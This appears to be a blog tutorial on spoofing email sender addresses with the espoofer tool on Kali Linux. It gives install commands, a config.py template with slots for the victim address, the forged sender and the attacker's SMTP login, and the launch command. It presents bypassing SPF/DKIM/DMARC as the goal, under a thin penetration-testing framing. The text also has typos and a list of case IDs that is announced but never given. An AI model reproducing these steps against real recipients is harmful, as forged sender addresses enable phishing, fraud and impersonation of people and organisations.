Welcome back again to GigoCyberSpace.com. Sorry for not being around. I have been working on a project.
Today we're going to learn how to spoof your email or email messages using espoofer in Kali Linux. There are different types of spoofing in penetration testing like IP Spoofing, DNS Spoofing, MAC Spoofing but we're going to go on Email Spoofing.
In email spoofing, the attacker forges the sender's email address, making it appear as if the message originated from a different person or organization. Espoofer has the ability to spoof email address using it's tools. And what more it can bypass SPF/DKIM/DMARC authentication.
Espoofer has special features like spoofing email even with authentication. But for you to meet the requirements must me have port 25 open and not block by your ISP. Also there are three more you use to initiate this attack:
- Server Mode(which is default configuration) - This requires n IP address and port 25 not blocked by your ISP
- Client mode - Must have an account with the victim(for example the hacker must have an account in Gmail if the victim address is vitcim@gmail.com)
- Manual mode - For debug purposes
But in this tutorial, we will use Client Mode for simplicity.
Step 1
Install Espoofer
Install Espoofer from the tool from GitHub by typing:
root@kali: ~ # git clone https://github.com/chenjj/espoofer
And install the required modules in pip with the command:
root@kali: ~ # pip install -r requirements.txt
Step 2
Setting up the Config File
You need to set the configuration in a python file called config.py to set for example the receiver's and sender's email, your password, email to be spoofed and case id. Your case id is like how espoofer would treà treat the spoofing and attack. The case id case_a1 is the would convenient case being used. Other case ids are:
Set the configuration file like this:
config ={
“legitimate_site_address”: b”<_email_to_spoof>”,
“victim_address”: b”<vitcim_email>”,
“case_id”: b”<case_id_mostly_client_a1>″,
“client_mode”: {
“sending_server”: (“smtp.gmail.com”, 587), # SMTP sending serve ip and port
#Your Real Email and Password
“username”: b”<your_real_email>”,
“password”: b”<your_passward_here>”,
},
}
Step 3
Launch Attack
Now we're set up the configuration file, it is time to launch the attack. Please just note that the SMTP server should be your own message server and not the receiver's.
Now type this to launch the attack:
root@kali: ~ # python3 espoofer.py -m c
And that's it. Once this is executed if everything requirements is meet, you will successful spoof your email address. If not seen in inbox, check your spam and promotion tab.
Tank you and see you next time.
